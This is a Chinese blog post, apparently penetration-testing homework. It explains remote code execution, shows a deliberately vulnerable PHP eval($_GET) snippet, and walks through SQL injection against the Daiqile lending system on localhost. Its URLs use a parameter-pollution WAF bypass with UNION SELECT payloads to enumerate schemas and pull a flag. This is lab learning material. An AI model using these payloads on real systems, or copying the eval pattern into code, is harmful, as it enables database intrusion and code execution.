当前位置: 首页 > news >正文

渗透第二次作业

目录

简述rce漏洞

可能产生rce漏洞的函数

RCE代码执行漏洞示例

贷齐乐系统多处SQL注入漏洞

​编辑

爆出库名

爆出表名

爆出表下的列名

查flag数据


简述rce漏洞

​ rce漏洞,即远程代码执行和远程命令执行漏洞。这种漏洞允许攻击者在后台服务器上远程注入操作系统命令或代码,从而控制后台系统。

可能产生rce漏洞的函数

1.PHP的system()和exec()函数:这些函数用于执行外部命令,如果未对用户输入进行适当的过滤或验证,攻击者可能利用这些函数执行任意命令。
2.PHP的eval()函数:该函数用于执行字符串作为PHP代码,如果未对用户输入进行适当的过滤或验证,攻击者可以利用此函数执行任意代码。
3.PHP的create_function()函数:该函数用于动态创建函数,如果未对用户输入进行适当的过滤或验证,攻击者可以利用此函数执行任意代码。

RCE代码执行漏洞示例

<?php$code=$_GET['x'];eval($code);
?>

访问刚刚创建的php文件,参数后面的内容写为“phpinfo()”.可以看到网页执行了phpinfo()语句并进行了回显。

访问刚刚创建的php文件,参数后面的内容写为“echo 123;”.可以看到网页执行了echo 123语句并进行了回显

贷齐乐系统多处SQL注入漏洞

该漏洞基于错误的WAF引发的,同SQLi靶场中的29关到31关类似,但该漏洞是错误的WAF引起的,而29关到31关则是HTTP参数污染引起的。还是有些不同之处的,而这里是HPP全局参数污染以及PHP的一个特性。

单引号闭合

爆出库名

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables&i.d=1&submit=1

爆出表名

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466/**/limit/**/0,1&i.d=1&submit=1

爆出表下的列名

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273&i.d=1&submit=1

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/0,1&i.d=1&submit=1

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/3,1&i.d=1&submit=1

查flag数据

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=1&submit=1

总结

PHP特性:在GET请求中,如果参数的键(key)包含点号(.),PHP会自动将其转换为下划线(_)。例如,参数i.d会被转换为i_d

http://www.lryc.cn/news/422978.html

相关文章:

  • 42.【C语言】冒泡排序
  • Linux安全与高级应用(七)深入Linux Shell脚本编程:循环与分支结构的高级应用
  • python爬虫滑块验证及各种加密函数(基于ddddocr进行的一层封装)
  • pytorch学习一(扩展篇):miniconda下载、安装、配置环境变量。miniconda创建多版本python环境。整理常用命令(亲测ok)
  • 说一下Android中的IdleHandler
  • Flake8 和 Autopep8 使用指南
  • OpenHarmony(数据)通信协议、数据存储—protobuf
  • vue3 依赖注入 vueRouter vuex
  • 在Windows上用Visual Studio编译OpenCV
  • 详解2024年最值得推荐的5款CRM软件:如何选择适合企业需求的CRM系统?
  • 2024靠谱的网站建设公司推荐
  • 第一天:Java基础与环境搭建
  • 动画魔法秀:JavaScript前端动画实战指南
  • 实训日记day26
  • 自定义实现一个 Redis 客户端
  • sql注入——sqlilabs16-26
  • 数据加载工具pg_bulkload插件的介绍
  • Windows禁止应用联网
  • zabbix邮件告警配置
  • 代码随想录算法训练营第 35 天 | LeetCode 416. 分割等和子集
  • 伪国企是指的什么?
  • Transformer在量化投资中的应用
  • a++ 和 ++a
  • Python配置文件格式——INI、JSON、YAML、XML、TOML
  • The First项目报告:Web3人生模拟器,DegenReborn带你重开币圈
  • 燃气经营企业从业人员考试真题及答案
  • 白骑士的Matlab教学进阶篇 2.1 数据可视化
  • 2024年8月 | 涉及侵权、抄袭洗稿违规行为公示
  • 操作系统快速入门(四)
  • 前缀异或优化